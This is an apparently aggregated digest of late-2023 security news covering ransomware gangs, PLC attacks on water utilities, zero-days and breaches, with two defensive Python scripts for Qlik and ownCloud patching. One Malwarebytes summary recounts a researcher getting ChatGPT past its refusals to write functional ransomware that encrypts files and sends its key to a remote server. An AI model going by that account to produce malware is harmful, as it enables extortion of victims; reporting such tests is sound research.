            Autosummary: Contributors and those who provided new ransomware information and stories this week include: @malwrhunterteam, @Ionut_Ilascu, @LawrenceAbrams, @billtoulas, @serghei, @Seifreed, @BleepinComputer, @demonslay335, @fwosar, @pcrisk, @CorvusInsurance, @elliptic, @AWNetworks, @ShadowStackRE, @ddd1ms, @3xp0rtblog, @jgreigj, and @BrettCallow. Finally, researchers released some interesting information about ransomware, including Cactus ransomware exploiting Qlik Sense flaws to breach networks, and Black Basta ransomware believed to have made over $100 million.


            TrickBot malware dev pleads guilty, faces 35 years in prison

            exploits
            2023-12-01 https://www.bleepingcomputer.com/news/security/trickbot-malware-dev-pleads-guilty-faces-35-years-in-prison/
            On Thursday, a Russian national pleaded guilty to charges related to his involvement in developing and deploying the Trickbot malware, which was used in attacks against hospitals, companies, and individuals in the United States and worldwide. [...]

            Autosummary: Dates and code descriptions:
            July 2016 - time of arrest: Modifying the Firefox web browser
            December 2016: Machine Query that lets TrickBot determine the description, manufacturer, name, product, serial number, version, and content of the root file directory of an infected machine
            August 2016 - December 2018: Code that grabs and saves from the web browser its name, ID, type, configuration files, cookies, history, local storage, Flash Local Shared Objects/LSO (Flash cookies)
            October 2016 - time of arrest: Code that searches for, imports, and loads files in the web browser's "profile" folders; these contain cookies, storage, history, Flash LSO cookies.


            Expert warns of Turtle macOS ransomware

            exploits ransomware
            2023-12-01 https://securityaffairs.com/155075/security/turtleransom-macos-ransomware.html
            The popular cybersecurity researcher Patrick Wardle dissected the new macOS ransomware Turtle used to target Apple devices. The popular cyber security researcher Patrick Wardle published a detailed analysis of the new macOS ransomware Turtle. Wardle pointed out that since Turtle was uploaded on Virus Total, it was labeled as malicious by 24 anti-malware solutions, suggesting […]

            Autosummary: “If we download the archive and unzip it, we find it contains files (prefixed with “TurtleRansom”) that appear to be compiled for common platforms, including, Windows, Linux, and yes, macOS” reads the analysis published by Wardle.


            IRGC-Affiliated Cyber Actors Exploit PLCs in Multiple Sectors, Including U.S. Water and Wastewater Systems Facilities

            exploits industry
            2023-12-01 https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-335a

            SUMMARY

            The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Environmental Protection Agency (EPA), and the Israel National Cyber Directorate (INCD)—hereafter referred to as "the authoring agencies"—are disseminating this joint Cybersecurity Advisory (CSA) to highlight continued malicious cyber activity against operational technology devices by Iranian Government Islamic Revolutionary Guard Corps (IRGC)-affiliated Advanced Persistent Threat (APT) cyber actors.

            The IRGC is an Iranian military organization that the United States designated as a foreign terrorist organization in 2019. IRGC-affiliated cyber actors using the persona “CyberAv3ngers” are actively targeting and compromising Israeli-made Unitronics Vision Series programmable logic controllers (PLCs). These PLCs are commonly used in the Water and Wastewater Systems (WWS) Sector and are additionally used in other industries including, but not limited to, energy, food and beverage manufacturing, and healthcare. The PLCs may be rebranded and appear as different manufacturers and companies. In addition to the recent CISA Alert, the authoring agencies are releasing this joint CSA to share indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) associated with IRGC cyber operations.

            Since at least November 22, 2023, these IRGC-affiliated cyber actors have continued to compromise default credentials in Unitronics devices. The IRGC-affiliated cyber actors left a defacement image stating, “You have been hacked, down with Israel. Every equipment ‘made in Israel’ is CyberAv3ngers legal target.” The victims span multiple U.S. states. The authoring agencies urge all organizations, especially cr

            Autosummary: On October 18, 2023, the CyberAv3ngers-linked Soldiers of Solomon claimed responsibility for compromising over 50 servers, security cameras, and smart city management systems in Israel; however, the majority of these claims were proven false. By using secure by design tactics, software manufacturers can make their product lines secure “out of the box” without requiring customers to spend additional resources making configuration changes, purchasing tiered security software and logs, monitoring, and making routine updates. VALIDATE SECURITY CONTROLS: In addition to applying mitigations, the authoring agencies recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the authoring agencies. The authoring agencies do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document.


            What custom GPTs mean for the future of phishing

            financial
            2023-11-30 https://www.helpnetsecurity.com/2023/11/30/custom-gpts-video/

            OpenAI is putting more power into the hands of users of GenAI, allowing them to create their custom AI agents without writing code. These custom GPTs are the latest leap forward in the rapidly evolving AI landscape, but this highly tailorable yet easily accessible capability creates a powerful tool for attackers to exploit. In this Help Net Security video, Tal Zamir, CTO of Perception Point, believes this will be a powerful tool malicious actors will … More



            Rhysida ransomware group hacked King Edward VII’s Hospital in London

            exploits ransomware
            2023-11-30 https://securityaffairs.com/154999/cyber-crime/rhysida-ransomware-king-edward-viis-hospital.html
            The Rhysida ransomware group claimed to have hacked King Edward VII’s Hospital in London. King Edward VII’s Hospital is a private hospital located on Beaumont Street in the Marylebone district of central London. It is a leading provider of acute and specialist medical care, with a focus on musculoskeletal health, urology, women’s health, and digestive […]

            Autosummary: Leaked images include medical reports, registration forms, x-rays, medical prescriptions, and more. The group claims to have stolen data belonging to a large number of patients and employees, including the Royal Family. “Threat actors leveraging Rhysida ransomware are known to impact “targets of opportunity,” including victims in the education, healthcare, manufacturing, information technology, and government sectors.


            CACTUS Ransomware Exploits Qlik Sense Vulnerabilities in Targeted Attacks

            exploits ransomware
            2023-11-30 https://thehackernews.com/2023/11/cactus-ransomware-exploits-qlik-sense.html
            A CACTUS ransomware campaign has been observed exploiting recently disclosed security flaws in a cloud analytics and business intelligence platform called Qlik Sense to obtain a foothold into targeted environments. "This campaign marks the first documented instance [...] where threat actors deploying CACTUS ransomware have exploited vulnerabilities in Qlik Sense for initial access," Arctic Wolf "

Autosummary: The cybersecurity company, which said it's responding to "several instances" of exploitation of the software, noted that the attacks are likely taking advantage of three flaws that have been disclosed over the past three months - CVE-2023-41265 (CVSS score: 9.9) - "


            FjordPhantom Android malware uses virtualization to evade detection

            exploits
            2023-11-30 https://www.bleepingcomputer.com/news/security/fjordphantom-android-malware-uses-virtualization-to-evade-detection/
            A new Android malware named FjordPhantom has been discovered using virtualization to run malicious code in a container and evade detection. [...] "

            Autosummary: The malware was discovered by Promon, whose analysts report that it currently spreads via emails, SMS, and messaging apps targeting banking apps in Indonesia, Thailand, Vietnam, Singapore, and Malaysia. "


            CISA urges water facilities to secure their Unitronics PLCs

            industry
            2023-11-30 https://www.helpnetsecurity.com/2023/11/30/water-system-secure-plcs/

            News that Iran-affiliated attackers have taken over a programmable logic controller (PLC) at a water system facility in Pennsylvania has been followed by a public alert urging other water authorities to immediately secure their own PLCs. “The cyber threat actors likely accessed the affected device—a Unitronics Vision Series PLC with a Human Machine Interface (HMI)—by exploiting cybersecurity weaknesses, including poor password security and exposure to the internet,” the Cybersecurity and Infrastructure Security Agency (CISA) noted. … More

            The post CISA urges water facilities to secure their Unitronics PLCs appeared first on Help Net Security.

            "

            Autosummary: "


            ThreatNG empowers organizations to identify and mitigate their ransomware risk

            exploits ransomware
            2023-11-30 https://www.helpnetsecurity.com/2023/11/30/threatng-ransomware-susceptibility-assessment-reporting-and-monitoring/

            ThreatNG Security launched its new Ransomware Susceptibility Assessment, Reporting, and Monitoring Solution. The new solution helps organizations assess their ransomware susceptibility externally and monitor their networks for potential threats. According to the FBI, ransomware attacks increased by 13% in 2022, and the average cost of a ransomware attack is now $1.85 million. With ransomware attacks rising, organizations of all sizes are at risk, but many are unprepared. The ThreatNG Security Ransomware Susceptibility Assessment, Reporting, and … More

            The post ThreatNG empowers organizations to identify and mitigate their ransomware risk appeared first on Help Net Security.

            "

Autosummary: The report includes the following sections: Breach and Ransomware Susceptibility Score; Internet-facing vulnerabilities and misconfigurations (ransomware infection vector); Phishing (ransomware infection vector); Precursor malware infection (ransomware infection vector); Third parties and managed service providers (ransomware infection vector). These capabilities help organizations of all sizes better understand and manage their ransomware risk by providing a comprehensive view of their security posture and identifying the most relevant ransomware infection vectors. "


            Apple fixes two new iOS zero-days in emergency updates

            exploits
            2023-11-30 https://www.bleepingcomputer.com/news/apple/apple-fixes-two-new-ios-zero-days-in-emergency-updates/
            Apple released emergency security updates to fix two zero-day vulnerabilities exploited in attacks and impacting iPhone, iPad, and Mac devices, reaching 20 zero-days patched since the start of the year. [...] "

            Autosummary: "


            Capital Health Hospitals hit by cyberattack causing IT outages

            ciber
            2023-11-30 https://www.bleepingcomputer.com/news/security/capital-health-hospitals-hit-by-cyberattack-causing-it-outages/
Capital Health hospitals and physician offices across New Jersey are experiencing IT outages after a cyberattack hit the non-profit organization's network earlier this week. [...] "

            Autosummary: The healthcare system manages two hospitals (the Regional Medical Center in Trenton and Capital Health Medical Center in Hopewell), an outpatient facility in Hamilton, and dozens of New Jersey primary and specialty care practices. "


            Cactus ransomware exploiting Qlik Sense flaws to breach networks

            exploits ransomware
            2023-11-30 https://www.bleepingcomputer.com/news/security/cactus-ransomware-exploiting-qlik-sense-flaws-to-breach-networks/
            Cactus ransomware has been exploiting critical vulnerabilities in the Qlik Sense data analytics solution to get initial access on corporate networks. [...] "

Autosummary: To mitigate the risks of a breach, Qlik recommends upgrading to the following versions of Sense Enterprise for Windows: August 2023 Patch 2; May 2023 Patch 6; February 2023 Patch 10; November 2022 Patch 12; August 2022 Patch 14; May 2022 Patch 16; February 2022 Patch 15; November 2021 Patch 17. Cactus ransomware emerged in March this year and adopted the double-extortion tactic, stealing data from victims and then encrypting it on compromised systems. "
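
Qlik ships fixes per release train, so "am I patched?" is not a single version comparison: an August 2023 build needs Patch 2 while a February 2022 build needs Patch 15. As an added example (not code from Qlik, Arctic Wolf or BleepingComputer), the Python below turns the list above into an inventory check that compares each build against the threshold for its own train. The version-label format, the sample hostnames and the conservative handling of trains absent from Qlik's list are this example's assumptions.

```python
"""Check Qlik Sense Enterprise for Windows builds against the per-release-train
patch levels Qlik listed as fixed. Added example: the table below is copied from
the advisory text; the label format and comparison logic are assumptions."""
import re

# Minimum patch number per release train, as listed by Qlik.
FIXED_PATCH_LEVELS = {
    "August 2023": 2,
    "May 2023": 6,
    "February 2023": 10,
    "November 2022": 12,
    "August 2022": 14,
    "May 2022": 16,
    "February 2022": 15,
    "November 2021": 17,
}

# Assumed label format, e.g. "August 2023 Patch 2" or a bare "August 2023".
_VERSION_RE = re.compile(
    r"^(?P<release>(?:February|May|August|November) \d{4})"
    r"(?: Patch (?P<patch>\d+))?$"
)


def parse_version(label: str) -> tuple[str, int]:
    """Split a label into (release train, patch number); no 'Patch N' means 0."""
    m = _VERSION_RE.match(label.strip())
    if not m:
        raise ValueError(f"unrecognised Qlik Sense version label: {label!r}")
    return m.group("release"), int(m.group("patch") or 0)


def is_patched(label: str) -> bool:
    """True if the build is at or above the fixed patch level for its train.

    Trains that are not in Qlik's list (older ones, or newer ones not yet added
    to the table) are reported as unpatched on purpose: the conservative answer
    is to review them by hand rather than to assume they are safe."""
    release, patch = parse_version(label)
    required = FIXED_PATCH_LEVELS.get(release)
    if required is None:
        return False
    return patch >= required


def triage(inventory: dict[str, str]) -> list[str]:
    """Hostnames whose Qlik Sense build still needs patching, sorted."""
    return sorted(host for host, label in inventory.items() if not is_patched(label))


if __name__ == "__main__":
    # Constructed sample inventory; hostnames and builds are made up.
    sample = {
        "qlik-prod-01": "August 2023 Patch 2",
        "qlik-prod-02": "May 2023 Patch 5",
        "qlik-dev-01": "November 2021 Patch 17",
        "qlik-legacy": "August 2021 Patch 9",
    }
    for host in triage(sample):
        print(f"{host}: {sample[host]} needs patching")
```

Feed it whatever your CMDB or the Qlik Management Console reports as the build label; anything the regex rejects raises rather than silently passing, which is the behaviour you want in a patch-compliance check.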


            Staples confirms cyberattack behind service outages, delivery issues

            ciber
            2023-11-30 https://www.bleepingcomputer.com/news/security/staples-confirms-cyberattack-behind-service-outages-delivery-issues/
American office supply retailer Staples took down some of its systems earlier this week after a cyberattack to contain the breach's impact and protect customer data. [...] "

            Autosummary: The disclosure comes after multiple Reddit reports posted online since Monday reported various Staples internal operation problems, including an inability to access Zendesk, VPN employee portals, print email, use phone lines, and more. "


            Will ChatGPT write ransomware? Yes.

            exploits ransomware
            2023-11-30 https://www.malwarebytes.com/blog/news/2023/11/will-chatgpt-write-ransomware-yes
            ChatGPT 4.0 can write basic working ransomware in minutes. "

Autosummary: ChatGPT 4.0 makes its first attempt at troubleshooting a compilation problem. ChatGPT 4.0 makes its second attempt at troubleshooting a compilation problem. ChatGPT 4.0 makes its third attempt at troubleshooting a compilation problem. In every case, ChatGPT solved the problem, and in doing so it enabled me, a non-C programmer, to write and troubleshoot basic but functional ransomware written in C, in almost no time. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. It encrypts files in whatever directory tree I choose, throws away the originals, hides the private key used for the encryption, stops running databases, and leaves ransom notes. The code used in the demonstration above was generated by ChatGPT in mere minutes, without objection, in response to basic one-line descriptions of ransomware features, even though I’ve never written a single line of C code in my life. ChatGPT 4.0 agreeing to write out a complete program instead of snippets (ChatGPT’s answer is truncated). Safeguards removed: Although I was able to work around ChatGPT’s insistence it wouldn’t write ransomware in March, I was often met with other restrictions that attempted to stop me doing unsafe things. I wanted to know if its safeguards would stop me from using it to write ransomware, and, if they didn’t, whether the ransomware it produced was any good. ChatGPT 4.0 had no objection to saving the private encryption key to a remote server. Programming tutor: Much to my surprise, after telling ChatGPT what features I wanted in my ransomware I was left with something that looked very much like a complete computer program. "


Critical Zoom Room bug allowed attackers to gain access to Zoom Tenants

            exploits
            2023-11-30 https://securityaffairs.com/155011/hacking/critical-zoom-room-bug.html
            A critical vulnerability in Zoom Room allowed threat actors to take over meetings and steal sensitive data. Researchers at AppOms discovered a vulnerability in Zoom Room as part of the HackerOne live hacking event H1-4420. Zoom Rooms is a feature of the Zoom video conferencing platform designed to enhance collaboration in physical meeting spaces, such as conference […] "

Autosummary: By Pierluigi Paganini. For example, if the owner is using an outlook.com email address, the Room’s email address will be room__<account ID>@outlook.com. "


            Not all cybercriminals are evil geniuses

            ciber
            2023-11-30 https://grahamcluley.com/not-all-cybercriminals-are-evil-geniuses/
            I thought some of you might enjoy this. Here’s a video of a recent after-dinner talk I gave, exploring (in a hopefully fun way!) whether cybercriminals are quite as smart as we sometimes think they are. Are malicious hackers geniuses? Are they all evil? Be sure to subscribe to my YouTube channel if you would … Continue reading "Not all cybercriminals are evil geniuses" "

            Autosummary: "


            Apple addressed 2 new iOS zero-day vulnerabilities

            exploits
            2023-11-30 https://securityaffairs.com/155026/security/apple-emergency-security-updates-2-zero-day.html
Apple released emergency security updates to address two zero-day vulnerabilities impacting iPhone, iPad, and Mac devices. Both flaws are actively exploited in attacks in the wild, and both reside in the WebKit browser engine. The first vulnerability, […] "

Autosummary: The vulnerabilities impact the following devices: iPhone XS and later; iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later; Macs running macOS "


            Bolivia wildfires: Locals care for animals affected by blazes

            latam
            2023-11-29 https://www.bbc.co.uk/news/world-latin-america-67562353?at_medium=RSS&at_campaign=KARANGA
            Images from mountainous San Buenaventura show locals doing their best to help vulnerable wildlife. "

            Autosummary: "


DJVU Ransomware's Latest Variant "Xaro" Disguised as Cracked Software

            exploits ransomware
            2023-11-29 https://thehackernews.com/2023/11/djvu-ransomwares-latest-variant-xaro.html
            A variant of a ransomware strain known as DJVU has been observed to be distributed in the form of cracked software. "While this attack pattern is not new, incidents involving a DJVU variant that appends the .xaro extension to affected files and demanding ransom for a decryptor have been observed infecting systems alongside a host of various commodity loaders and infostealers," Cybereason "

            Autosummary: PrivateLoader, for its part, establishes contact with a command-and-control (C2) server to fetch a wide range of stealer and loader malware families like RedLine Stealer, Vidar, Lumma Stealer, Amadey, SmokeLoader, Nymaim, GCleaner, XMRig, and Fabookie, in addition to dropping Xaro. "


            GoTitan Botnet Spotted Exploiting Recent Apache ActiveMQ Vulnerability

            exploits
            2023-11-29 https://thehackernews.com/2023/11/gotitan-botnet-spotted-exploiting.html
The recently disclosed critical security flaw impacting Apache ActiveMQ is being actively exploited by threat actors to distribute a new Go-based botnet called GoTitan as well as a .NET program known as PrCtrl Rat that's capable of remotely commandeering the infected hosts. The attacks involve the exploitation of a remote code execution bug (CVE-2023-46604, CVSS score: 10.0) that has been "

            Autosummary: "


            Zero-Day Alert: Google Chrome Under Active Attack, Exploiting New Vulnerability

            exploits
            2023-11-29 https://thehackernews.com/2023/11/zero-day-alert-google-chrome-under.html
Google has rolled out security updates to fix seven security issues in its Chrome browser, including a zero-day that has come under active exploitation in the wild. Tracked as CVE-2023-6345, the high-severity vulnerability has been described as an integer overflow bug in Skia, an open source 2D graphics library. Benoît Sevens and Clément Lecigne of Google's Threat Analysis Group (TAG) have been "

            Autosummary: "


            Business metrics for Cisco Cloud Observability capability enables customers to protect revenue

            industry
            2023-11-29 https://www.helpnetsecurity.com/2023/11/29/cisco-cloud-observability-business-metrics/

Cisco announced new business metrics in Cisco Cloud Observability, powered by the Cisco Observability Platform, to add business context for modern applications running on AWS. This latest release also supports integration with AWS services and application performance monitoring (APM) correlation, and provides end-to-end visibility into the performance of cloud native applications. Traditional application monitoring tools only provide visibility of application and infrastructure performance metrics. This leaves teams (including ITOps, DevOps and SREs) managing modern applications … More

            The post Business metrics for Cisco Cloud Observability capability enables customers to protect revenue appeared first on Help Net Security.

            "

            Autosummary: Cisco Cloud Observability will allow us to visualize and correlate metrics, events, logging, and tracing (MELT) data so we can identify, triage, and troubleshoot problems at an even greater velocity,” said Alice McElroy, Director, IT Operational Excellence, Royal Caribbean. "


            Google fixes Chrome zero day exploited in the wild (CVE-2023-6345)

            exploits
            2023-11-29 https://www.helpnetsecurity.com/2023/11/29/cve-2023-6345/

Google has released an urgent security update to fix a number of vulnerabilities in the Chrome browser, including a zero-day vulnerability (CVE-2023-6345) that is being actively exploited in the wild. About CVE-2023-6345 CVE-2023-6345, reported by Benoît Sevens and Clément Lecigne of Google’s Threat Analysis Group, is due to an integer overflow in Skia – an open source 2D graphics library commonly used as a graphics engine for Google Chrome, ChromeOS, Android, Flutter, and others. The company … More

            The post Google fixes Chrome zero day exploited in the wild (CVE-2023-6345) appeared first on Help Net Security.

            "

            Autosummary: "


            200+ Malicious Android Apps Targeting Iranian Banks: Experts Warn

            financial
            2023-11-29 https://thehackernews.com/2023/11/200-malicious-apps-on-iranian-android.html
An Android malware campaign targeting Iranian banks has expanded its capabilities and incorporated additional evasion tactics to fly under the radar. That's according to a new report from Zimperium, which discovered more than 200 malicious apps associated with the malicious operation, with the threat actor also observed carrying out phishing attacks against the targeted financial institutions. "

            Autosummary: The phishing campaigns are no less sophisticated, impersonating the actual websites to exfiltrate credentials, account numbers, device models, and IP addresses to two actor-controlled Telegram channels. "


            How Continuous Pen Testing Protects Web Apps from Emerging Threats

            ransomware
            2023-11-29 https://www.bleepingcomputer.com/news/security/how-continuous-pen-testing-protects-web-apps-from-emerging-threats/
The nature and ubiquity of modern web apps make them ripe for targeting by hackers. Learn more from Outpost24 about the value of continuous monitoring to secure modern web apps. [...] "

            Autosummary: Impacts of a web app compromise Beyond end-user frustration, there are far-reaching consequences of successful attacks against web apps, including: Data breaches that result from unauthorized access to sensitive information. Why continuous monitoring of web apps is essential Not only are modern web applications dynamic and constantly evolving, but so are cyber threat actors and the methods they use. "


            Okta: October data breach affects all customer support system users

            financial
            2023-11-29 https://www.bleepingcomputer.com/news/security/okta-october-data-breach-affects-all-customer-support-system-users/
Okta's investigation into the breach of its Help Center environment last month revealed that the hackers obtained data belonging to all customer support system users. [...] "

Autosummary: "The Auth0/CIC support case management system was also not impacted by this incident," Okta said. According to the company, the stolen report included fields for full name, username, email, company name, user type, address, last password change/reset, role, phone number, mobile number, time zone, and SAML Federation ID. "


            Iranian Hackers Exploit PLCs in Attack on Water Authority in U.S.

            exploits industry
            2023-11-29 https://thehackernews.com/2023/11/iranian-hackers-exploit-plcs-in-attack.html
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) revealed that it's responding to a cyber attack that involved the active exploitation of Unitronics programmable logic controllers (PLCs) to target the Municipal Water Authority of Aliquippa in western Pennsylvania. The attack has been attributed to an Iranian-backed hacktivist collective known as Cyber Av3ngers. "Cyber threat "

            Autosummary: "


            Cobre Panamá: Panama orders controversial copper mine"s closure

            latam
            2023-11-29 https://www.bbc.co.uk/news/world-latin-america-67565315?at_medium=RSS&at_campaign=KARANGA
Environmentalists warned the mine threatened water supplies and damaged Panama's coastal area. "

            Autosummary: "


            Microsoft starts testing new Windows 11 Energy Saver feature

            industry
            2023-11-29 https://www.bleepingcomputer.com/news/microsoft/microsoft-starts-testing-new-windows-11-energy-saver-feature/
Microsoft has started testing a new Windows 11 Energy Saver feature that helps customers extend their portable computers' battery life. [...] "

            Autosummary: "


            Black Basta ransomware made over $100 million from extortion

            exploits ransomware
            2023-11-29 https://www.bleepingcomputer.com/news/security/black-basta-ransomware-made-over-100-million-from-extortion/
            Russia-linked ransomware gang Black Basta has raked in at least $100 million in ransom payments from more than 90 victims since it first surfaced in April 2022, according to joint research from Corvus Insurance and Elliptic. [...] "

            Autosummary: Since it emerged, this ransomware gang has infiltrated and extorted many high-profile victims, including the American Dental Association, Sobeys, Knauf, Yellow Pages Canada, Toronto Public Library, and the German defense contractor Rheinmetall. "


            Hackers breach US water facility via exposed Unitronics PLCs

            industry
            2023-11-29 https://www.bleepingcomputer.com/news/security/hackers-breach-us-water-facility-via-exposed-unitronics-plcs/
CISA (Cybersecurity & Infrastructure Security Agency) is warning that threat actors breached a U.S. water facility by hacking into Unitronics programmable logic controllers (PLCs) exposed online. [...] "

Autosummary: "Cyber threat actors are targeting PLCs associated with WWS facilities, including an identified Unitronics PLC, at a U.S. water facility," reads CISA's alert. "


            Japanese Space Agency JAXA hacked in summer cyberattack

            ciber
            2023-11-29 https://www.bleepingcomputer.com/news/security/japanese-space-agency-jaxa-hacked-in-summer-cyberattack/
            The Japan Aerospace Exploration Agency (JAXA) was hacked in a cyberattack over the summer, potentially compromising sensitive space-related technology and data. [...] "

            Autosummary: "


            Google addressed the sixth Chrome Zero-Day vulnerability in 2023

            exploits
            2023-11-29 https://securityaffairs.com/154980/security/google-addressed-the-sixth-chrome-zero-day-vulnerability-in-2023.html
Google on Wednesday released security updates to address a new actively exploited zero-day vulnerability, tracked as CVE-2023-6345, in the Chrome browser. CVE-2023-6345 is a high-severity integer overflow in Skia. Skia is an open-source 2D graphics library […] "

Autosummary: CVE-2023-6345 is the sixth actively exploited zero-day vulnerability in Chrome addressed by Google this year; the other ones are: CVE-2023-2033 (CVSS score: 8.8) – Type Confusion in V8; CVE-2023-2136 (CVSS score: 9.6) – Integer overflow in the Skia graphics library; CVE-2023-3079 (CVSS score: 8.8) – Type Confusion in V8; CVE-2023-4863 (CVSS score: 8.8) – "


            Dollar Tree hit by third-party data breach impacting 2 million people

            financial
            2023-11-29 https://www.bleepingcomputer.com/news/security/dollar-tree-hit-by-third-party-data-breach-impacting-2-million-people/
            Discount store chain Dollar Tree was impacted by a third-party data breach affecting 1,977,486 people after the hack of service provider Zeroed-In Technologies. [...] "

            Autosummary: "


            Update now! Chrome fixes actively exploited zero-day vulnerability

            exploits
            2023-11-29 https://www.malwarebytes.com/blog/news/2023/11/update-now-chrome-fixes-actively-exploited-zero-day-vulnerability
Google has released an update to Chrome which includes seven security fixes. Make sure you're using the latest version! "

Autosummary: After the update, the version should be listed as 119.0.6045.199 for Mac and Linux, and 119.0.6045.199/.200 for Windows, or later. "


            Report: The state of authentication security 2023

            government
            2023-11-28 https://www.helpnetsecurity.com/2023/11/28/report-the-state-of-authentication-security-2023/

This survey set out to explore these challenges, to identify common practices, and to provide insight into how organizations can bolster their defenses. Key findings from the survey cover: current authentication practices; authentication-related cyberattacks; security incidents and impact; password management; security awareness and standards. Download report: The state of authentication security 2023

            The post Report: The state of authentication security 2023 appeared first on Help Net Security.

            "

            Autosummary: "


            N. Korean Hackers "Mixing" macOS Malware Tactics to Evade Detection

            exploits industry
            2023-11-28 https://thehackernews.com/2023/11/n-korean-hackers-mixing-and-matching.html
            The North Korean threat actors behind macOS malware strains such as RustBucket and KANDYKORN have been observed "mixing and matching" different elements of the two disparate attack chains, leveraging RustBucket droppers to deliver KANDYKORN. The findings come from cybersecurity firm SentinelOne, which also tied a third macOS-specific malware called ObjCShellz to the RustBucket campaign. "

            Autosummary: "


            Police dismantle ransomware group behind attacks in 71 countries

            exploits ransomware
            2023-11-28 https://www.bleepingcomputer.com/news/security/police-dismantle-ransomware-group-behind-attacks-in-71-countries/
            In cooperation with Europol and Eurojust, law enforcement agencies from seven nations have arrested in Ukraine the core members of a ransomware group linked to attacks against organizations in 71 countries. [...] "

            Autosummary: "


            ownCloud vulnerability can be used to extract admin passwords

            exploits
            2023-11-28 https://www.malwarebytes.com/blog/news/2023/11/owncloud-vulnerability-can-be-used-to-extract-admin-passwords
            A vulnerability in the ownCloud file sharing app could lead to the exposure of sensitive credentials like admin passwords. "

Autosummary: What to do: ownCloud says you should delete the file owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php. Then change the following: your ownCloud admin password; the mail server credentials; database credentials; the Object-Store/S3 access key. Note that Docker containers from before February 2023 are not vulnerable to the credential disclosure. "
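
Deleting the file closes the hole, but rotating every credential is only the right scope once you know whether anyone already fetched the phpinfo() page. The Python below, an added example and not ownCloud's own code, does both halves: it removes GetPhpInfo.php from a document root, and it scans web-server access logs for requests that reached that file, treating any client that got a 200 for it as having read the output. The combined log format, the document-root layout and the sample log lines are constructed for this example.

```python
"""Remove ownCloud's GetPhpInfo.php and hunt access logs for requests that hit it.
Added example, not ownCloud's own tooling; log format and samples are constructed."""
import re
from pathlib import Path

# File named in the advisory, relative to the ownCloud document root.
GETPHPINFO_REL_PATH = "apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php"


def remove_getphpinfo(docroot: str) -> bool:
    """Delete the file if it exists under docroot. Returns True if a file was removed."""
    target = Path(docroot) / GETPHPINFO_REL_PATH
    if target.is_file():
        target.unlink()
        return True
    return False


# Apache/nginx combined log format (assumed): ip ident user [time] "METHOD path proto" status ...
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def find_getphpinfo_hits(log_lines) -> list[dict]:
    """Requests whose path contains GetPhpInfo.php, with client IP and status.

    Matching on the file name rather than the full path keeps installs served
    from a sub-directory (e.g. /owncloud/...) in scope."""
    hits = []
    for line in log_lines:
        m = _LOG_RE.match(line)
        if m and "GetPhpInfo.php" in m.group("path"):
            hits.append({"ip": m.group("ip"), "path": m.group("path"),
                         "status": int(m.group("status"))})
    return hits


def exposed_to(log_lines) -> set[str]:
    """Client IPs that received a 200 for the file. Assume those clients read the
    phpinfo() output, and therefore the credentials the advisory lists."""
    return {h["ip"] for h in find_getphpinfo_hits(log_lines) if h["status"] == 200}


# Constructed sample log lines (documentation IP ranges, not real clients).
SAMPLE_LOG = [
    '203.0.113.7 - - [27/Nov/2023:10:01:22 +0000] "GET /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php HTTP/1.1" 200 48213 "-" "curl/8.4.0"',
    '203.0.113.7 - - [27/Nov/2023:10:01:25 +0000] "GET /owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php HTTP/1.1" 200 48213 "-" "curl/8.4.0"',
    '198.51.100.4 - - [27/Nov/2023:10:02:01 +0000] "GET /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php HTTP/1.1" 404 153 "-" "python-requests/2.31"',
    '192.0.2.9 - - [27/Nov/2023:10:03:10 +0000] "GET /index.php/apps/files/ HTTP/1.1" 200 9321 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    import tempfile
    # Stand-in document root with a placeholder file at the advisory path.
    with tempfile.TemporaryDirectory() as tmp:
        f = Path(tmp) / GETPHPINFO_REL_PATH
        f.parent.mkdir(parents=True)
        f.write_text("<?php phpinfo();")
        print("removed:", remove_getphpinfo(tmp), "second run:", remove_getphpinfo(tmp))
    for hit in find_getphpinfo_hits(SAMPLE_LOG):
        print(hit)
    print("phpinfo served to:", exposed_to(SAMPLE_LOG))
```

Run the log scan over every front-end and reverse proxy that sat in front of the instance, not just the ownCloud host; a 404 in the application log can still be a 200 at a proxy that served a cached copy.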


            Ukrainian ransomware gang behind high-profile attacks dismantled

            exploits ransomware
            2023-11-28 https://www.helpnetsecurity.com/2023/11/28/ukrainian-ransomware-gang-high-profile-attacks-dismantled/

            Law enforcement and judicial authorities from seven countries have joined forces with Europol and Eurojust to dismantle and apprehend in Ukraine key figures behind significant ransomware operations. On 21 November, 30 properties were searched in the regions of Kyiv, Cherkasy, Rivne and Vinnytsia, resulting in the arrest of the ringleader. Four of the ringleader’s most active accomplices were also detained. More than 20 investigators from Norway, France, Germany and the United States were deployed to … More

            The post Ukrainian ransomware gang behind high-profile attacks dismantled appeared first on Help Net Security.

            "

            Autosummary: "


            SMBs face surge in “malware free” attacks

            exploits
            2023-11-28 https://www.helpnetsecurity.com/2023/11/28/smbs-attacks-q3-2023/

            “Malware free” attacks, attackers’ increased reliance on legitimate tools and scripting frameworks, and BEC scams were the most prominent threats small and medium businesses (SMBs) faced in Q3 2023, says the inaugural SMB Threat Report by Huntress, a company that provides a security platform and services to SMBs and managed service providers (MSPs). “Malware free” attacks on the rise Attackers deployed malware in 44% of cases, but the remaining 56% of incidents included use of … More

            The post SMBs face surge in “malware free” attacks appeared first on Help Net Security.

            "

